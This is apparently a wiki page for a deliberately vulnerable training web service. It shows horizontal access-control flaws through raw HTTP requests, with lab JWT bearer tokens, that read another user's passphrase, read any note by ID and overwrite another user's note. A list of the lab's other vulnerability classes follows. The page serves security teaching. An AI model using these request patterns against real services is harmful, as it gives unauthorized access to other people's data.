-
Notifications
You must be signed in to change notification settings - Fork 177
Horizontal Access Control
Sam Sanoop edited this page Aug 4, 2022
·
2 revisions
Horizontal escalation of privilege is possible (one user can view/modify information of another user).
- It is possible to view passphrases created by an user if you know the username
GET /api/v2/passphrase/test HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MTAwMzk3LCJleHAiOjE2MDkyNzMxOTcsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.MMv-cE5sDjECTwfKaxZ9usxk5qx6ekeyk01ulrE97ZI
Connection: close
Referer: http://dvws.local/passphrasegen.html
If you know the note ID (e.g. 1-8) it is possible to read any note
GET /api/v2/notes/6 HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyMiIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiLCJ1c2VyOmFkbWluIl0sImlhdCI6MTY1OTY0ODg5OCwiZXhwIjoxNjU5ODIxNjk4LCJpc3MiOiJodHRwczovL2dpdGh1Yi5jb20vc25vb3B5c2VjdXJpdHkifQ.0qStFIfQ3WEtX_SYujlXsJQZWMqN6c1HE8FrKn_HFuQ
Connection: close
Referer: http://dvws.local/notes.html
- If you know the note name, and change the content of the note, or delete it. As such it is possible for any user to change the note content of any user. E.g.
PUT /api/v2/notes/testnote HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoic2FtcyIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MTAyNTYxLCJleHAiOjE2MDkyNzUzNjEsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.BCEvHUgsE6H0GkgOltN2146Yp8kdts6wzYaKomYdOuI
Content-Type: application/json;charset=utf-8
Content-Length: 55
Origin: http://dvws.local
Connection: close
Referer: http://dvws.local/notes.html
{"name":"sam","body":"this can be changed by any user"}
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- Client Side Template Injection